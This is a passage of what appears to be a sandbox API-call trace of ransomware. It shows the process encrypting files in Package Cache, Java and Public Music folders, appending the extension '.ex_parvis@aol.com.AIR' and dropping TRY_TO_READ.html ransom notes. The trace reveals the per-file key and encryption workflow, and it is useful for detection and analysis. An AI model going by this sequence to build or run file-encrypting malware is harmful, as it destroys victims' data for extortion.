lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.897] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=462976) returned 1 [0167.897] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x71080 [0167.897] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.897] GetProcessHeap () returned 0x2e0000 [0167.897] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.897] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.898] WriteFile (in: hFile=0x5c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.903] WriteFile (in: hFile=0x5c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.903] WriteFile (in: hFile=0x5c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.906] ReadFile (in: hFile=0x5c4, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x71080, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x71080, lpOverlapped=0x0) returned 1 [0167.926] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.926] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.926] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 1 [0167.927] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 82 [0167.927] GetProcessHeap () returned 0x2e0000 [0167.927] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x319788 [0167.927] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" [0167.927] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0167.927] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.931] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0167.931] GetProcessHeap () returned 0x2e0000 [0167.931] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.931] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=666) returned 1 [0167.931] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x29a [0167.931] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.931] GetProcessHeap () returned 0x2e0000 [0167.931] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.931] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.931] WriteFile (in: hFile=0x5c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.933] WriteFile (in: hFile=0x5c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.933] WriteFile (in: hFile=0x5c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.933] ReadFile (in: hFile=0x5c4, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x29a, lpOverlapped=0x0) returned 1 [0167.933] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=-666, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.933] WriteFile (in: hFile=0x5c4, lpBuffer=0x31d0488*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0488*, lpNumberOfBytesWritten=0x2acf9c8*=0x29a, lpOverlapped=0x0) returned 1 [0167.933] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xb1adc410, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1adc410, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b20a8 [0167.934] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.934] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.934] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", dwFileAttributes=0x80) returned 1 [0167.934] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 90 [0167.934] GetProcessHeap () returned 0x2e0000 [0167.934] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x319788 [0167.934] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" [0167.934] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.934] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.937] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0167.937] GetProcessHeap () returned 0x2e0000 [0167.937] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.937] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=781872) returned 1 [0167.937] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbee30 [0167.937] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.937] GetProcessHeap () returned 0x2e0000 [0167.937] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.937] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.937] WriteFile (in: hFile=0x5c8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.944] WriteFile (in: hFile=0x5c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.944] WriteFile (in: hFile=0x5c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.944] ReadFile (in: hFile=0x5c8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xbee30, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xbee30, lpOverlapped=0x0) returned 1 [0168.004] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0168.004] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0168.004] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", dwFileAttributes=0x80) returned 1 [0168.004] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 82 [0168.004] GetProcessHeap () returned 0x2e0000 [0168.004] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x319788 [0168.004] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" [0168.004] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0168.005] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0168.008] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0168.008] GetProcessHeap () returned 0x2e0000 [0168.008] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0168.008] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=766) returned 1 [0168.008] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2fe [0168.008] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0168.008] GetProcessHeap () returned 0x2e0000 [0168.008] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0168.008] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0168.008] WriteFile (in: hFile=0x5c8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0168.012] WriteFile (in: hFile=0x5c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0168.012] WriteFile (in: hFile=0x5c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0168.012] ReadFile (in: hFile=0x5c8, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x2fe, lpOverlapped=0x0) returned 1 [0168.012] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=-766, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.012] WriteFile (in: hFile=0x5c8, lpBuffer=0x31d04e8*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d04e8*, lpNumberOfBytesWritten=0x2acf9c8*=0x2fe, lpOverlapped=0x0) returned 1 [0168.012] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb1b02570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b02570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b20e8 [0168.013] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0168.018] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Sun\\Java\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xb1b02570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b02570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2128 [0168.018] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\Java\\Java Update\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\java\\java update\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0168.019] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb1b02570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0xb1b02570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b02570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0168.020] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb1b02570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0xb1b02570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b02570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0168.020] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb1b02570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0xb1b02570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b02570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0168.020] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb1b74990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b74990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2168 [0168.020] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0168.020] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0168.020] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", dwFileAttributes=0x80) returned 1 [0168.020] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 50 [0168.020] GetProcessHeap () returned 0x2e0000 [0168.020] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0168.021] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" [0168.021] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0168.021] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0168.023] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0168.023] GetProcessHeap () returned 0x2e0000 [0168.023] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0168.023] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4842585) returned 1 [0168.023] SetFilePointer (in: hFile=0x5d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x49e459 [0168.023] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0168.023] GetProcessHeap () returned 0x2e0000 [0168.023] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0168.023] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0168.024] WriteFile (in: hFile=0x5d4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0168.027] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, 